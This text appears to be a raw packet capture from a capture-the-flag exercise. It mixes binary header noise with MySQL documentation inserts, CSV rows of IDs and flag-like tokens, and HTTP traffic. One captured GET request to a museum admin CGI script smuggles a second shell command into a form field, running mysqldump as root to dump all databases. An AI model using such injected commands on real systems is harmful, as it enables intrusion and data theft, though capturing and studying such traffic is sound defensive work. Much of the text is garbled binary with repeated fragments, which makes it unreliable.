\'true\' ELSE \'false\' END;\n -> \'true\'\nmysql> SELECT CASE BINARY \'B\'\n -> WHEN \'a\' THEN 1 WHEN \'b\' THEN 2 END;\n -> NULL',''),(105,'BIT_LENGTH',23,' BIT_LENGTH(str)\nReturns the length of the string str in bits.\n','mysql> SELECT BIT_LENGTH(\'text\');\n -> 32',''),(106,'EXTERIORRING',0,' ExteriorRing(poly)\nReturns the exterior ring of the Polygon value poly\nas a LineString.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(ExteriorRing(GeomFromText(@poly)));\n+-------------------------------------------+\n| AsText(ExteriorRing(GeomFromText(@poly))) |\n+-------------------------------------------+\n| LINESTRING(0 0,0 3,3 3,3 0,0 0) |\n+-------------------------------------------+',''),(107,'GEOMFROMWKB',13,' GeomFromWKB(wkb[,srid])\n GeometryFromCbbBi0`ET@/p܂Ao0E<@?x  3P,tj   )zWKB(wkb[,srid])\nConstructs a geometry value of any type using its WKB representation and SRID.\n','',''),(108,'SHOW SLAVE HOSTS',6,'SHOW SLAVE HOSTS\n\nDisplays a list of slaves currently registered with the master.\nAny slave not started with the --report-host=slave_name\noption is not visible in that list.\n','',''),(109,'START TRANSACTION',10,'By default, MySQL runs with autocommit mode enabled. This means that\nas soon as you execute a statement that updates (modifies) a table,\nMySQL stores the update on disk.\n\nIf you are using transaction-safe tables (like InnoDB or BDB),\nyou can disable autocommit mode with the following statement:\n\nSET AUTOCOMMIT=0;\n\nAfter disabling autocommit mode by setting the AUTOCOMMIT variable to\nzero, you must use COMMIT to store your changes to disk or\nROLLBACK if you want to ignore the changes you have made since\nthe beginning of your transaction.\n\nIf you want to disable autocommit mode for a single series of\nstatements, you can use the START TRANSACTION statement:\n','START TRANSACTION;\nSELECT @A:=SUM(salary) FROM table1 WHERE type=1;\nUPDATE table2 SET summary=@A WHERE type=1;\nCOMMIT;',''),(110,'BETWEEN AND',26,' expr BETWEEN min AND max\nIf expr is greater than or equal to min and expr is\nless than or equal to maCZZBi0`EL@/܂Sŀo0E4\a@? 3 Pu}U$X )CZZBi0`EL@/܂Sŀo0E4@?c 3 P(b36͘ )̌Cbb0`BiET@/Ԁo0SE<@@w  3P,tj   )zWKB(wkb[,srid])\nConstructs a geometry value of any type using its WKB representation and SRID.\n','',''),(108,'SHOW SLAVE HOSTS',6,'SHOW SLAVE HOSTS\n\nDisplays a list of slaves currently registered with the master.\nAny slave not started with the --report-host=slave_name\noption is not visible in that list.\n','',''),(109,'START TRANSACTION',10,'By default, MySQL runs with autocommit mode enabled. This means that\nas soon as you execute a statement that updates (modifies) a table,\nMySQL stores the update on disk.\n\nIf you are using transaction-safe tables (like InnoDB or BDB),\nyou can disable autocommit mode with the following statement:\n\nSET AUTOCOMMIT=0;\n\nAfter disabling autocommit mode by setting the AUTOCOMMIT variable to\nzero, you must use COMMIT to store your changes to disk or\nROLLBACK if you want to ignore the changes you have made since\nthe beginning of your transaction.\n\nIf you want to disable autocommit mode for a single series of\nstatements, you can use the START TRANSACTION statement:\n','START TRANSACTION;\nSELECT @A:=SUM(salary) FROM table1 WHERE type=1;\nUPDATE table2 SET summary=@A WHERE type=1;\nCOMMIT;',''),(110,'BETWEEN AND',26,' expr BETWEEN min AND max\nIf expr is greater than or equal to min and expr is\nless than or equal to maCZZ0`BiEL@/go0AE4\a@@ 3 Pu}U$X )C$ZZ0`BiEL@/go0AE4@@b 3 P(b36͘ )̌C>bbBi0`ET@/p܂Ao0E<@?x  3P1tj   )zx, BETWEEN returns 1,\notherwise it returns 0. This is equivalent to the expression\n(min <= expr AND expr <= max) if all the arguments are of the\nsame type. Otherwise type conversion takes place according to the rules\ndescribed at the beginning of this section, but applied to all the three\narguments. Note: Before MySQL\n4.0.5, arguments were converted to the type of expr instead.\n','mysql> SELECT 1 BETWEEN 2 AND 3;\n -> 0\nmysql> SELECT \'b\' BETWEEN \'a\' AND \'c\';\n -> 1\nmysql> SELECT 2 BETWEEN 2 AND \'3\';\n -> 1\nmysql> SELECT 2 BETWEEN 2 AND \'x-3\';\n -> 0',''),(111,'MULTIPOLYGON',2,' MultiPolygon(poly1,poly2,...)\nConstructs a WKB MultiPolygon value from a set of WKB Polygon\narguments.\nIf any argument is not a WKB Polygon, the return value is NULL.\n','',''),(112,'TIME_FORMAT',14,' TIME_FORMAT(time,format)\nThis is used like the DATE_FORMAT() function, but the\nformat string may contain only those format specifiers that handle\nhours, minutes, and seconds. Other specifiers produce a NULL value or\n0.\n','',''),(113,'LEFT',23,' LEFT(str,len)\nReturns the leftmost len characters from the string str.\n','mysql> SELECT LEFT(\'foobarbar\', 5);\n -> \'fooba\'',''),(114,'FLUSH QUERY CACHE',7,'You can defragment the qCYbb0`BiET@/Ԁo0SE<@@w  3P1tj   )zx, BETWEEN returns 1,\notherwise it returns 0. This is equivalent to the expression\n(min <= expr AND expr <= max) if all the arguments are of the\nsame type. Otherwise type conversion takes place according to the rules\ndescribed at the beginning of this section, but applied to all the three\narguments. Note: Before MySQL\n4.0.5, arguments were converted to the type of expr instead.\n','mysql> SELECT 1 BETWEEN 2 AND 3;\n -> 0\nmysql> SELECT \'b\' BETWEEN \'a\' AND \'c\';\n -> 1\nmysql> SELECT 2 BETWEEN 2 AND \'3\';\n -> 1\nmysql> SELECT 2 BETWEEN 2 AND \'x-3\';\n -> 0',''),(111,'MULTIPOLYGON',2,' MultiPolygon(poly1,poly2,...)\nConstructs a WKB MultiPolygon value from a set of WKB Polygon\narguments.\nIf any argument is not a WKB Polygon, the return value is NULL.\n','',''),(112,'TIME_FORMAT',14,' TIME_FORMAT(time,format)\nThis is used like the DATE_FORMAT() function, but the\nformat string may contain only those format specifiers that handle\nhours, minutes, and seconds. Other specifiers produce a NULL value or\n0.\n','',''),(113,'LEFT',23,' LEFT(str,len)\nReturns the leftmost len characters from the string str.\n','mysql> SELECT LEFT(\'foobarbar\', 5);\n -> \'fooba\'',''),(114,'FLUSH QUERY CACHE',7,'You can defragment the qC bbBi0`ET@/,|po0E< G@?  P2*? \ e_A74A6385F20C65E3369564E318ECE47,ucsb,cccc
DCFB604FD491582253E87D67FDE6593A,ucsb,cccc
9A888CE28B7C5237AE7475BE604D3B24,ucsb,cccc
B8C94E62F086EE971FE272D4D039626D,ucsb,cccc
1997893E83118E57D2FDCE3EC20CA227,ucsb,cccc
4A78CD62B4F30E4CBCC604DBE1FBE5B3,ucsb,cccc
BF847C2717DF172C78E68D397E27D3C7,ucsb,cccc
5DF8DCB01BE8AC2D10D3304C0E1113D3,ucsb,cccc
930B2ECEEE29ADFF772E2D4CBAB9A2B6,ucsb,cccc
76206A231184D62E94B2865C1FBBC161,ucsb,blah==
FEFC8394E25B6FA2562CF49C12265B0F,ucsb,blah==
7EA2A7CC30053812108BC815E0017830,ucsb,blah==
773BA4B4505359F765CEDCE785B547A2,ucsb,MTNzEwEDADlcuMU/Ngfb7E/GXKWhKkPy01Wlew==
3DD09101D28744168D26E9160BC2A8A8,ucsb,blah==
D2F31661C607630D18228C10449FF64A,ucsb,MTNzEwEDADq54EkBPYFpqyzmgSTtBW6UTLfgNQ==
766509CE4D21C006106773FFACB77A44,ucsb,blah==
A9ADA3506461284F15DA565B30EB9C7A,ucsb,blah==
66569AD389366396C6104D4617704F12,ucsb,blah==
1E290D59F1B315B9F1FFCE1B6BA86840,ucsb,MTNzEwEDADsC+EdMKIOLjNmXF0mATL3SqojbXQ==
2B6E6484EF65F0AE2B147842228E02C1,ucsb,MTNzEwEDADyfjVARnpsH33nL5I1Z6YZlcDDRkw==
2D4EE22E6A603DA61EBB18385A2FF7E1,ucsb,MTNzEwEDAD37Y1fgLduQof19pamATJp2ahsDtA==
EDC2E8C022713E65C5C391E96C7A5C5D,ucsb,MTNzEwEDAD5k1RndWEiKQJlSrg+vkqab0fgI5w==
D08A57F84ED04B600799B38D3C bb0`BiET@/o0AE< G@@  P2*? \ e_A74A6385F20C65E3369564E318ECE47,ucsb,cccc
DCFB604FD491582253E87D67FDE6593A,ucsb,cccc
9A888CE28B7C5237AE7475BE604D3B24,ucsb,cccc
B8C94E62F086EE971FE272D4D039626D,ucsb,cccc
1997893E83118E57D2FDCE3EC20CA227,ucsb,cccc
4A78CD62B4F30E4CBCC604DBE1FBE5B3,ucsb,cccc
BF847C2717DF172C78E68D397E27D3C7,ucsb,cccc
5DF8DCB01BE8AC2D10D3304C0E1113D3,ucsb,cccc
930B2ECEEE29ADFF772E2D4CBAB9A2B6,ucsb,cccc
76206A231184D62E94B2865C1FBBC161,ucsb,blah==
FEFC8394E25B6FA2562CF49C12265B0F,ucsb,blah==
7EA2A7CC30053812108BC815E0017830,ucsb,blah==
773BA4B4505359F765CEDCE785B547A2,ucsb,MTNzEwEDADlcuMU/Ngfb7E/GXKWhKkPy01Wlew==
3DD09101D28744168D26E9160BC2A8A8,ucsb,blah==
D2F31661C607630D18228C10449FF64A,ucsb,MTNzEwEDADq54EkBPYFpqyzmgSTtBW6UTLfgNQ==
766509CE4D21C006106773FFACB77A44,ucsb,blah==
A9ADA3506461284F15DA565B30EB9C7A,ucsb,blah==
66569AD389366396C6104D4617704F12,ucsb,blah==
1E290D59F1B315B9F1FFCE1B6BA86840,ucsb,MTNzEwEDADsC+EdMKIOLjNmXF0mATL3SqojbXQ==
2B6E6484EF65F0AE2B147842228E02C1,ucsb,MTNzEwEDADyfjVARnpsH33nL5I1Z6YZlcDDRkw==
2D4EE22E6A603DA61EBB18385A2FF7E1,ucsb,MTNzEwEDAD37Y1fgLduQof19pamATJp2ahsDtA==
EDC2E8C022713E65C5C391E96C7A5C5D,ucsb,MTNzEwEDAD5k1RndWEiKQJlSrg+vkqab0fgI5w==
D08A57F84ED04B600799B38D3C2 bbBi0`ET@/,|po0E< H@?  P22? $= e_BF3DE60,ucsb,cccc
E9142B8E04181DFC43062576CF23352B,ucsb,ddd
1CCB988264622CC89C944BBB14AEC70C,ucsb,MTNzEwEDAD/FE2pEEURONgd05dBuPQMEf5wWxQ==
7B29BB2F99B1CA7EB208168C48798177,ucsb,MTNzEwEDAEDqZi0TxhXFo/Y6XcnnuwGyMDehfA==
029D3C71EC998628CE13CE1E4EA1AC98,ucsb,ddd
5C229CF0EC9DE6BA1248F991B9D7C0E0,ucsb,MTNzEwEDAEHvDYV7c73Vi6iyDZA31t0Jkwpe6Q==
7E3A0E7A4469A50EC18F34CF52942D44,ucsb,MTNzEwEDAEI9cOttqIDkMg0WegAweXveruwqAw==
57EC539930AD1AB1461F0198083FDC25,ucsb,MTNzEwEDAEPW/O56bVwKxanBWbxNHC7e1/FNSA==
B513B996ABFE9943B3E11C67C4B49F9A,ucsb,MTNzEwEDAETY/ja8cwFo7w3qwQtsdY3tPiZCxw==
6C583DF5A558A3A5718DF04FBA3EEF0E,ucsb,MTNzEwEDAEX4zQJcUGJX5TYZZ071sNoV808FUQ==
401962B23211A573A6A0FF663A31D9B7,ucsb,MTNzEwEDAEZmiZVS4v3QigY3gdM8LKkgtR/bow==
9D2C2C802C9E07B93A50A33FCE3AB859,ucsb,MTNzEwEDAEf0R4dk4hRD1eK/hBVHbyY9IRHzQQ==
6FF0D54474840D0A0DAFE895DCF6BB5E,ucsb,MTNzEwEDAEjz6IDwNuba+3rNcwHdzD8UgMVyRQ==
3F564AB0242D1252CF71ABE27F10CF62,ucsb,MTNzEwEDAEljt9HmzfZXFrhlpUJyCpNRUKa14g==
B8BC6549F5CF74F140C5A8F719871FFE,ucsb,MTNzEwEDAErJ/E6vkN2h+V0cKNT3Pl5n0lwxqw==
AF92AE17E8C1F24B2F7585E23242400E,ucsb,MTNzEwEDAEt/KCc22AlylGl5xs9T5AW2nyGzWQ==
C7B75E604297C1F83618DDDE43D0C128,ucsb,MTNzEwEDAEyW4Ctj/0rWplraKlpS7JxmPesYaQ==
96B670D6A1CCCM bb0`BiET@/o0AE< H@@  P22? $= e_BF3DE60,ucsb,cccc
E9142B8E04181DFC43062576CF23352B,ucsb,ddd
1CCB988264622CC89C944BBB14AEC70C,ucsb,MTNzEwEDAD/FE2pEEURONgd05dBuPQMEf5wWxQ==
7B29BB2F99B1CA7EB208168C48798177,ucsb,MTNzEwEDAEDqZi0TxhXFo/Y6XcnnuwGyMDehfA==
029D3C71EC998628CE13CE1E4EA1AC98,ucsb,ddd
5C229CF0EC9DE6BA1248F991B9D7C0E0,ucsb,MTNzEwEDAEHvDYV7c73Vi6iyDZA31t0Jkwpe6Q==
7E3A0E7A4469A50EC18F34CF52942D44,ucsb,MTNzEwEDAEI9cOttqIDkMg0WegAweXveruwqAw==
57EC539930AD1AB1461F0198083FDC25,ucsb,MTNzEwEDAEPW/O56bVwKxanBWbxNHC7e1/FNSA==
B513B996ABFE9943B3E11C67C4B49F9A,ucsb,MTNzEwEDAETY/ja8cwFo7w3qwQtsdY3tPiZCxw==
6C583DF5A558A3A5718DF04FBA3EEF0E,ucsb,MTNzEwEDAEX4zQJcUGJX5TYZZ071sNoV808FUQ==
401962B23211A573A6A0FF663A31D9B7,ucsb,MTNzEwEDAEZmiZVS4v3QigY3gdM8LKkgtR/bow==
9D2C2C802C9E07B93A50A33FCE3AB859,ucsb,MTNzEwEDAEf0R4dk4hRD1eK/hBVHbyY9IRHzQQ==
6FF0D54474840D0A0DAFE895DCF6BB5E,ucsb,MTNzEwEDAEjz6IDwNuba+3rNcwHdzD8UgMVyRQ==
3F564AB0242D1252CF71ABE27F10CF62,ucsb,MTNzEwEDAEljt9HmzfZXFrhlpUJyCpNRUKa14g==
B8BC6549F5CF74F140C5A8F719871FFE,ucsb,MTNzEwEDAErJ/E6vkN2h+V0cKNT3Pl5n0lwxqw==
AF92AE17E8C1F24B2F7585E23242400E,ucsb,MTNzEwEDAEt/KCc22AlylGl5xs9T5AW2nyGzWQ==
C7B75E604297C1F83618DDDE43D0C128,ucsb,MTNzEwEDAEyW4Ctj/0rWplraKlpS7JxmPesYaQ==
96B670D6A1CCCQ bbBi0`ET@/,|po0E< I@?  P2:?  e`8C10950228FCFB2448B5,ucsb,MTNzEwEDAE2BtcsOcl0TgQ7exPII235NhHRKew==
F449E3C8911CEB4C1F53853C97253906,ucsb,MTNzEwEDAE4esCrN6+SkcFaJHtviln44A7+2HQ==
0BD0E8936E8887F14FF05A1455C41785,ucsb,MTNzEwEDAE9CuTdNMuqdXF3kLqcJpthN+pgI2A==
3196331A9DE148A693A6BE0837807206,ucsb,MTNzEwEDAFBj7TGxB0lIMVIJMyFtAhopPh/kag==
04B7C7E91BDDCD27A4E4AB835FB256FE,ucsb,MTNzEwEDAFHAXgP4aalffCNrc3xU4UTwH9Qspg==
C2D300AEBA03DD809EB4DA6CE1C2BFDF,ucsb,MTNzEwEDAFLk272JFqxP7gNOpYKDuYCeLhKVbg==
6AF0ADC965BA281E8C794E94F34A67D3,ucsb,MTNzEwEDAFOGLUWsV3+jwz51FUe+ClPpgrUdqw==
18CD388C83B3637744E3FD30F3C2AE61,ucsb,MTNzEwEDAFRKLc0sNa5qNuhdpCDa8Wj3TsbkyQ==
E107739341A051A0EBA7E515EB5D6925,ucsb,MTNzEwEDAFXRpW+x7PVLhXsUuMpNhMEZm/d4QQ==
8E9CA2C630AAF7790EF7AE03BC66B5D6,ucsb,MTNzEwEDAFZ02SJZRFr6Q4OJVh3Kwxv+joF5qQ==
DA3E0012459A2765487CE8B8EC60FA2B,ucsb,MTNzEwEDAFfOumBnNJIRE8kQs8/CD1LkwQNfmg==
9F630E5A738AD1A346F32D1DB8FFDDD3,ucsb,MTNzEwEDAFjd8AWifH+c3Ph82lCgEIO9Zbwu6g==
79AE3B2FBE2A405C2E1A2D1A7A129C3C,ucsb,MTNzEwEDAFmh41gqLwv/o5sFEH3YPnonA/+BaA==
6B502E8AF702E6077926E4D103A8F275,ucsb,MTNzEwEDAFoY63L147ynY/9uACH1eeC14ebmHg==
069C3F65C9B7F3835DA0646B08AC9350,ucsb,MTNzEwEDAFsCWF/d9MnGipDw9iv70XdE6ZFH+g==
C7F06DAAA18540DEADAA617DE94DB970,ucsb,MTNzEwEDAFypOgGdgCh bb0`BiET@/o0AE< I@@  P2:?  e`8C10950228FCFB2448B5,ucsb,MTNzEwEDAE2BtcsOcl0TgQ7exPII235NhHRKew==
F449E3C8911CEB4C1F53853C97253906,ucsb,MTNzEwEDAE4esCrN6+SkcFaJHtviln44A7+2HQ==
0BD0E8936E8887F14FF05A1455C41785,ucsb,MTNzEwEDAE9CuTdNMuqdXF3kLqcJpthN+pgI2A==
3196331A9DE148A693A6BE0837807206,ucsb,MTNzEwEDAFBj7TGxB0lIMVIJMyFtAhopPh/kag==
04B7C7E91BDDCD27A4E4AB835FB256FE,ucsb,MTNzEwEDAFHAXgP4aalffCNrc3xU4UTwH9Qspg==
C2D300AEBA03DD809EB4DA6CE1C2BFDF,ucsb,MTNzEwEDAFLk272JFqxP7gNOpYKDuYCeLhKVbg==
6AF0ADC965BA281E8C794E94F34A67D3,ucsb,MTNzEwEDAFOGLUWsV3+jwz51FUe+ClPpgrUdqw==
18CD388C83B3637744E3FD30F3C2AE61,ucsb,MTNzEwEDAFRKLc0sNa5qNuhdpCDa8Wj3TsbkyQ==
E107739341A051A0EBA7E515EB5D6925,ucsb,MTNzEwEDAFXRpW+x7PVLhXsUuMpNhMEZm/d4QQ==
8E9CA2C630AAF7790EF7AE03BC66B5D6,ucsb,MTNzEwEDAFZ02SJZRFr6Q4OJVh3Kwxv+joF5qQ==
DA3E0012459A2765487CE8B8EC60FA2B,ucsb,MTNzEwEDAFfOumBnNJIRE8kQs8/CD1LkwQNfmg==
9F630E5A738AD1A346F32D1DB8FFDDD3,ucsb,MTNzEwEDAFjd8AWifH+c3Ph82lCgEIO9Zbwu6g==
79AE3B2FBE2A405C2E1A2D1A7A129C3C,ucsb,MTNzEwEDAFmh41gqLwv/o5sFEH3YPnonA/+BaA==
6B502E8AF702E6077926E4D103A8F275,ucsb,MTNzEwEDAFoY63L147ynY/9uACH1eeC14ebmHg==
069C3F65C9B7F3835DA0646B08AC9350,ucsb,MTNzEwEDAFsCWF/d9MnGipDw9iv70XdE6ZFH+g==
C7F06DAAA18540DEADAA617DE94DB970,ucsb,MTNzEwEDAFypOgGdgC+ bbBi0`ET@/,|po0E< J@?  P2B?  e`3v2k9nL/1ZeN3DslbsSMA==
CCA5C09CB9F12EB334A7DB9FFB5ABA07,ucsb,MTNzEwEDAF2mqbgrvogRveFSWQXwjfr2BO0KTA==
2507D8DA82CF555572BD93C21F30028A,ucsb,MTNzEwEDAF5eTiNUgak5KxpZemIxr4yQOPkHGA==
34C9CF76F64F21902C52BEF899ECFAEB,ucsb,MTNzEwEDAF96+UKNg2GVClpgxkD1M0UXzVtmNg==
6A09B7E6F504A34FA0B9C46A70734D87,ucsb,MTNzEwEDAGAH5Wg+lQxfj95p/iArhHyoUIjIdg==
448C2E6C6E040FB0987483B141E52DEA,ucsb,MTNzEwEDAGEcuPzf1n53UL5ekV6P4qvyzWU6lg==
8031202964DDE0B34AD331DE94626386,ucsb,MTNzEwEDAGLqOGk4LpvzzyD4/iqJnuudS7VssA==
69C176FB9A6C3DFEF7680806B7584EDF,ucsb,MTNzEwEDAGNsI/5XSisiIppT7fwNJvQDW5/Dag==
149D1D986CDBBDD089B6344A0D6BB537,ucsb,MTNzEwEDAGSZR3TSM5nm+8Rn0/Kt2PYvA2JtfQ==
06778277415002CB6A1ED3385FED6730,ucsb,MTNzEwEDAGWRBE4gG5G2Z32yeDIboW39hFzBAQ==
7EC20BF45A0782D6545C83070D0AD3DD,ucsb,MTNzEwEDAGYJFR76dc3fWY3gPZXRRoHdPCEviA==
72EB101F8C45BFBC1F5D2C12FCD85198,ucsb,MTNzEwEDAGdbAoM7Gzl7cCqL8G0XAxv9dD3PLg==
17C5BBD7A6E1CAD5EE571C163C38533D,ucsb,MTNzEwEDAGg/jdCJYL8a2jXBjPjppzvFeXHc3g==
E74035E5894D526061C81C4E0BC4AF34,ucsb,MTNzEwEDAGlzhUQYvA7Ajrz5kYkOZXOjUq4skA==
6294DF27910058EA3FE2AE5E42D9D579,ucsb,MTNzEwEDAGoC2HjxIS1mt/Z1D5T3TO9UYxVdVQ==
8AEE667F87A28530E75D7486107B0EE8,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
767B5BAD8991A0DCF bb0`BiET@/o0AE< J@@  P2B?  e`3v2k9nL/1ZeN3DslbsSMA==
CCA5C09CB9F12EB334A7DB9FFB5ABA07,ucsb,MTNzEwEDAF2mqbgrvogRveFSWQXwjfr2BO0KTA==
2507D8DA82CF555572BD93C21F30028A,ucsb,MTNzEwEDAF5eTiNUgak5KxpZemIxr4yQOPkHGA==
34C9CF76F64F21902C52BEF899ECFAEB,ucsb,MTNzEwEDAF96+UKNg2GVClpgxkD1M0UXzVtmNg==
6A09B7E6F504A34FA0B9C46A70734D87,ucsb,MTNzEwEDAGAH5Wg+lQxfj95p/iArhHyoUIjIdg==
448C2E6C6E040FB0987483B141E52DEA,ucsb,MTNzEwEDAGEcuPzf1n53UL5ekV6P4qvyzWU6lg==
8031202964DDE0B34AD331DE94626386,ucsb,MTNzEwEDAGLqOGk4LpvzzyD4/iqJnuudS7VssA==
69C176FB9A6C3DFEF7680806B7584EDF,ucsb,MTNzEwEDAGNsI/5XSisiIppT7fwNJvQDW5/Dag==
149D1D986CDBBDD089B6344A0D6BB537,ucsb,MTNzEwEDAGSZR3TSM5nm+8Rn0/Kt2PYvA2JtfQ==
06778277415002CB6A1ED3385FED6730,ucsb,MTNzEwEDAGWRBE4gG5G2Z32yeDIboW39hFzBAQ==
7EC20BF45A0782D6545C83070D0AD3DD,ucsb,MTNzEwEDAGYJFR76dc3fWY3gPZXRRoHdPCEviA==
72EB101F8C45BFBC1F5D2C12FCD85198,ucsb,MTNzEwEDAGdbAoM7Gzl7cCqL8G0XAxv9dD3PLg==
17C5BBD7A6E1CAD5EE571C163C38533D,ucsb,MTNzEwEDAGg/jdCJYL8a2jXBjPjppzvFeXHc3g==
E74035E5894D526061C81C4E0BC4AF34,ucsb,MTNzEwEDAGlzhUQYvA7Ajrz5kYkOZXOjUq4skA==
6294DF27910058EA3FE2AE5E42D9D579,ucsb,MTNzEwEDAGoC2HjxIS1mt/Z1D5T3TO9UYxVdVQ==
8AEE667F87A28530E75D7486107B0EE8,ucsb,MTNzEwEDAAEXJpZl/VCl2kGuRwhYQu7utSCrlw==
767B5BAD8991A0DC bbBi0`ET@/p܂Ao0E<@?x  3P6tj O  )zuery cache to better utilize its memory\nwith the FLUSH QUERY CACHE statement.\nThe statement does not remove any queries from the cache.\n\nThe RESET QUERY CACHE statement removes all query results from the\nquery cache. The FLUSH TABLES statement also does this.\n','',''),(115,'RAND',4,' RAND()\n RAND(N)\nReturns a random floating-point value in the range from 0 to 1.0.\nIf an integer argument N is specified, it is used as the seed value\n(producing a repeatable sequence).\n','mysql> SELECT RAND();\n -> 0.9233482386203\nmysql> SELECT RAND(20);\n -> 0.15888261251047\nmysql> SELECT RAND(20);\n -> 0.15888261251047\nmysql> SELECT RAND();\n -> 0.63553050033332\nmysql> SELECT RAND();\n -> 0.70100469486881',''),(116,'RPAD',23,' RPAD(str,len,padstr)\nReturns the string str, right-padded with the string padstr\nto a length of len characters. If str is longer\nthan len, the return value is shortened to len characters.\n','mysql> SELECT RPAD(\'hi\',5,\'?\');\n -> \'hi???\'\nmysql> SELECT RPAD(\'hi\',1,\'?\');\n -> \'h\'',''),(117,'INSERT INTO',6,'INSERT inserts new rows into an existing table. The INSERT ...\nVALUES and INSERT ... SET forms of the statement insert rows based\non explicitly specified values. The INSERT .C Bi0`E@/"<o0EG@?  P#-^t~ 1U6e.HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 18:30:35 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Transfer-Encoding: chunked Content-Type: text/html c0 Thank you for joining our struggle

Your contributions

0 C bb0`BiET@/Ԁo0SE<@@w  3P6tj O  )zuery cache to better utilize its memory\nwith the FLUSH QUERY CACHE statement.\nThe statement does not remove any queries from the cache.\n\nThe RESET QUERY CACHE statement removes all query results from the\nquery cache. The FLUSH TABLES statement also does this.\n','',''),(115,'RAND',4,' RAND()\n RAND(N)\nReturns a random floating-point value in the range from 0 to 1.0.\nIf an integer argument N is specified, it is used as the seed value\n(producing a repeatable sequence).\n','mysql> SELECT RAND();\n -> 0.9233482386203\nmysql> SELECT RAND(20);\n -> 0.15888261251047\nmysql> SELECT RAND(20);\n -> 0.15888261251047\nmysql> SELECT RAND();\n -> 0.63553050033332\nmysql> SELECT RAND();\n -> 0.70100469486881',''),(116,'RPAD',23,' RPAD(str,len,padstr)\nReturns the string str, right-padded with the string padstr\nto a length of len characters. If str is longer\nthan len, the return value is shortened to len characters.\n','mysql> SELECT RPAD(\'hi\',5,\'?\');\n -> \'hi???\'\nmysql> SELECT RPAD(\'hi\',1,\'?\');\n -> \'h\'',''),(117,'INSERT INTO',6,'INSERT inserts new rows into an existing table. The INSERT ...\nVALUES and INSERT ... SET forms of the statement insert rows based\non explicitly specified values. The INSERT .C 0`BiE@/=o0˃2EG@@  P#-^t~ 1U6e.HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 18:30:35 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Transfer-Encoding: chunked Content-Type: text/html c0 Thank you for joining our struggle

Your contributions

0 CbbBiʪET@/o0oo0E<@@ յPbp 7=yzCbb0`BiET@/Lo0<E<@@  յPbp 7=yzCbbBi0`ET@/p܂Ao0E<@?x  3P;tj   ){.. SELECT form inserts\nrows selected from another table or tables. The INSERT ... VALUES\nform with multiple value lists is supported in MySQL 3.22.5 or\nlater. The INSERT ... SET syntax is supported in MySQL\n3.22.10 or later.\nINSERT ... SELECT is discussed further in\nSee also : [INSERT SELECT, , INSERT SELECT].\n','INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n VALUES ({expr | DEFAULT},...),(...),...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]',''),(118,'RESTORE',7,'\nRESTORE TABLE tbl_name [, tbl_name] ... FROM \'/path/to/backup/directory\'\n\nRestores the table or tables from a backup that was made with BACKUP\nTABLE. Existing tables are not overwritten; if you try to restore over\nan existing table, you get an error. Just as BACKUP TABLE,\nRESTORE TABLE currently works only for MyISAM tables.\nThe directory should be specified as a full pathname.\n\nThe backup for each table consists of its *.frm format file and\n*.MYD data file. The restore operation restores those files, then\nuses them to rebuild the *.MYI index file. Restoring takes longer\nthan backing up due to the need to rebuild the indexes. The more indexes the\ntable has, the longer it takes.\n','',''),(119,'CREATE DATABASE',28,'CREATECZZBi0`EL@/܂Sŀo0E4@? 3 P >1g )ԌC(bb0`BiET@/Ԁo0SE<@@w  3P;tj   ){.. SELECT form inserts\nrows selected from another table or tables. The INSERT ... VALUES\nform with multiple value lists is supported in MySQL 3.22.5 or\nlater. The INSERT ... SET syntax is supported in MySQL\n3.22.10 or later.\nINSERT ... SELECT is discussed further in\nSee also : [INSERT SELECT, , INSERT SELECT].\n','INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n VALUES ({expr | DEFAULT},...),(...),...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]',''),(118,'RESTORE',7,'\nRESTORE TABLE tbl_name [, tbl_name] ... FROM \'/path/to/backup/directory\'\n\nRestores the table or tables from a backup that was made with BACKUP\nTABLE. Existing tables are not overwritten; if you try to restore over\nan existing table, you get an error. Just as BACKUP TABLE,\nRESTORE TABLE currently works only for MyISAM tables.\nThe directory should be specified as a full pathname.\n\nThe backup for each table consists of its *.frm format file and\n*.MYD data file. The restore operation restores those files, then\nuses them to rebuild the *.MYI index file. Restoring takes longer\nthan backing up due to the need to rebuild the indexes. The more indexes the\ntable has, the longer it takes.\n','',''),(119,'CREATE DATABASE',28,'CREATEC:ZZ0`BiEL@/go0AE4@@ 3 P >1g )ԌC""Bi0`E@/Sŀo0E@? , 3 P >1F  )GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive C""0`BiE@/go0AE@@ , 3 P >1F  )GET /~museum/cgi-bin/museum_admin.pl?first=a&last=a%3B+mysqldump+-uroot+-pctftest+--all-databases&password=sad HTTP/1.0 User-Agent: Wget/1.10 Accept: */* Host: 10.12.1.3 Connection: Keep-Alive CbbBi0`ET@/,|po0E< K@?  P2J? G ebE1954BD28FBD90BBF,ucsb,MTNzEwEDAAJoem/drMvuNepZsENE/ErJ6lB63A==
85DA67F2F893FAFB31A35706554DD34A,ucsb,MTNzEwEDAAPKIQF8W6cDHzcGoMkUII9evvqNYg==
C4B88BFB560E29A1D49BA3556B061004,ucsb,MTNzEwEDAASRN70K11md4IWMGiT/vCIPDCtRpg==
6BC742CB0F068EEFCF8B9D65C187C472,ucsb,MTNzEwEDAAVoE+Pl+yMKWrz6Q25SCEm/2UbAcg==
510AFF95D6756040CE475028F24330F1,ucsb,MTNzEwEDAAYQwA3kOGVnGWqxvVwOLV7u/WnDTg==
AB34C22487188D2842490C2777A71B8F,ucsb,MTNzEwEDAAeYkVLSJtkzbKD9Qz6vpvRfvptO8g==
